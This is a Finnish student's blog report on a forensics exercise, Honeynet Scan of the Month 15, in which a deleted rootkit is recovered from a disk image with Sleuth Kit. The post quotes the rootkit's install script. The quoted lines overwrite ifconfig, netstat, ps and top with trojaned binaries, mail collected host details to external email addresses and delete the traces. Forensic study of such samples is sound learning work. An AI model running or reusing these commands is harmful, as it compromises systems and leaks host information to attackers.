Linux palvelimena kurssin
ensimmäinen varsinainen tehtävä
Aloitus
Tehtävänä oli suorittaa "Scan of the month 15".
Kyseessä oli tapaus, jossa koneelle oli asennettu rootkit,
ja poistettu tämän jälkeen. Tehtävänä oli ladata hakemisto,
kuvailla rootkitin analysointi ja etsiä rootkitin korvaavat tiedostot.
Suoritin tehtävän HP Elitebook 2560p läppärillä. Käyttöjärjestelmänä
live cd Xubuntu 12.10.
Aloitin tehtävän boottaamalla linuxin USB-tikulta, jonka olin
jo aijemmassa tehtävässä luonut.
Xubuntun käynnistyttyä avasin terminaalin, ja ensitöikseni
vaihdoin näppäimistön
suomeksi komennolla "sudo setxkbmap fi"
Tämän jälkeen latasin mahdolliset päivitykset komennolla
"sudo apt-get update"
Tehtävänantoon tutustuttuani latasin tiedoston
honeynet.tar.gz.
Opettaja oli kehottanut asentamaan sleuth kitin, jonka mukana
tulee ohjelma nimeltä "Autopsy"
"sudo
apt-get install sleuthkit"
Seuraavaksi kokeilin ohjelman toimivuutta
"sudo autopsy"
Ilmeni ettei autopsy ollutkaan tullut paketin mukana, joten
hain sen erikseen komennolla
"sudo
apt-get install autopsy"
Tässä vaiheessa eteeni tuli ongelma. Ilmeisesti live
USB-tikkuni ei ole täydessä toiminnassa, sillä
saan
virheilmoituksen:
"BEGIN
failed--compilation aborted at (eval 1) line 4.
) -- aborting
dpkg: error: unable to stat
triggers deferred file `/var/lib/dpkg/triggers/
E: Sub-process
/usr/bin/dpkg returned an error code (2)"
Pari tuntia tutkittuani huomasin, että mikään ohjelma ei
suostu asentumaan. Saan aina
lopuksi virheilmoituksen. Tämän jälkeen päätin tehdä
itselleni uuden live cd:n ja aloittaa alusta.
Uusi yritys
Tällä kertaa tutustuin sleuth kitin ominaisuuksiin hieman
tarkemmin.
Löysin mielenkiintoisen työkalun nimeltä
"tsk_recover" joka vaikutti sopivan juuri tähän tarkoitukseen.
Kyseisellä ohjelmalla saisin kaikki kohdennetut (allocated)
ja kohdentamattomat (unallocated) tiedostot yhteen hakemistoon.
Tutustuin tsk_recovery ohjelmaan hyvän tovin.
Ajoin komennon "tsk_recover -e honeypot.hda8.dd
tsk_recover"
Nyt pääsen seikkailemaan ja tarkastelemaan tiedostoja.
Hakemiston alussa oli paketti "lk.tgz"
Kiinnostuksestani halusin purkaa moisen paketin. Tein tämän
komennolla "tar -xvf lk-tgz"
Seuraavaksi pääsin seikkailemaan kyseiseen hakemistoon.
Hakemistosta löytyi minulle hyvin tuntemattomia tiedostoja,
mutta tämä ei vielä tarkoittaisi että asiassa olisi jotain mätää.
Löysin tiedostoja mm nimeltä linsniffer, lsattr,
netstat, sense ja install.
linsniffer tiedostosta googlaamalla löytyi tietoa, joka
viittasi sen kuuluvan rootkittiin.
Tarkastelin install tiedostoa "nano install"
Yllätyksekseni sain eteeni espanjaa.
Tässä vaiheessa olin lievästi sanottuna hukassa tehtävän
kanssa, joten päätin pitää tunnin-parin tauon.
Rootkitin sisällön avaus
Palasin tarkastelemaan install tiedostoa tarkemmin, ilman
sanakirjaa. Löysin sähköpostiosoitteen "bibi_damm@yahoo.com"
Törmäsin myös osoitteeseen last@linuxmail.org. Last
tematiikka toistui tsk_recoverilla löytyneissä tiedostoissa useampaan
otteeseen. Olisiko "last" kenties jokin muuttuva parametri
rootkitissa? En osaa sanoa.
Rootkitistä löytyi tekstiä
echo
"********* Instalarea Rootkitului A Pornit La Drum *********"
echo "********* Mircea SUGI PULA
********************************"
echo "********* Multumiri La Toti Care M-Au
Ajutat **************"
echo "********* Lemme Give You A Tip :
**************************"
echo "********* Scream & swear as much as you
can ***************"
echo "********* Ignore everything, call your
freedom ************"
echo "********* Cuz anyway nobody will hear you
and no one will *"
echo "********* Care about you **********************************"
echo
echo
Tämä herätti minussa lievää ahdistuksen tunnetta, kuten oli
varmasti tarkoituskin.
Rootkitissä myös ilmeisesti asennettiin olemassa olevien
tiedostojen päälle asioita
echo -n "* Inlocuim
nestat ... alea alea "
rm -rf /sbin/ifconfig
mv ifconfig /sbin/ifconfig
rm -rf /bin/netstat
mv netstat /bin/netstat
rm -rf /bin/ps
mv ps /bin/ps
rm -rf /usr/bin/top
mv top /usr/bin/top
cp -f mkxfs /usr/sbin/
echo "* Gata..."
echo -n "* Dev... "
echo
echo
Suurta osaa tekstiä/koodia en ymmärtänyt laisinkaan, mutta
silmiin pisti eräs kohta, jossa viitattiin "install" tiedostosta
löytyneisiin sähköpostiosoitteisiin.
echo "* Luam Informatiile dorite ..."
echo "* Info : $(uname -a)" >> computer
echo "* Hostname : $(hostname -f)" >> computer
echo "* IfConfig : $(/sbin/ifconfig | grep inet)" >>
computer
echo "* Uptime : $(uptime)" >> computer
echo "* Cpu Vendor ID : $(cat /proc/cpuinfo|grep vendor_id)"
>> computer
echo "* Cpu Model : $(cat /proc/cpuinfo|grep model)" >>
computer
echo "* Cpu Speed: $(cat /proc/cpuinfo|grep MHz)" >>
computer
echo "* Bogomips: $(cat /proc/cpuinfo|grep bogomips)" >>
computer
echo "* Spatiu Liber: $(df -h)" >> computer
echo "* Gata ! Trimitem Mailul ...Asteapta Te Rog "
cat computer | mail -s "placinte" last@linuxmail.org
cat computer | mail -s "roote" bidi_damm@yahoo.com
echo "* Am trimis mailul ... stergem fisierele care nu mai trebuie
."
echo
echo
echo "* G A T A *"
echo
echo "* That Was Nice
Last "
Lopussa vastaan tuli tekstinpätkä:
Lopussa vastaan tuli tekstinpätkä:
cd /
rm -rf last lk.tgz computer lk.tar.gz
Tiedän
rm komennon poistavan tiedostoja, joten päättelin rootkitin
"piilottamisen" tapahtuvan tässä.
Lopputulos
En
osannut nykyisellä tietämykselläni selvittää asiaa tämän enempää. Sain tietoon
rootkitin sisältöä ja sain sen purettua hakemistoon. Rootkitin tekijästä en
saanut muuta tietoa, kun sähköpostiosoitteen, tosin tekijän nimi tuskin on Bidi
Damm. Tein tehtävää kaiken kaikkiaan noin 6 tuntia, mukaanlaskien uuden USB
live cd:n teon.
Otto
Kalliomäki
Lähteet
http://wiki.sleuthkit.org
http://www.sleuthkit.org/case/sotm_15/index.html
http://old.honeynet.org/scans/scan15/
http://terokarvinen.com/2012/aikataulu-linux-palvelimena-ict4tn003-7-ict4tn003-kevaalla-2013
Ei kommentteja:
Lähetä kommentti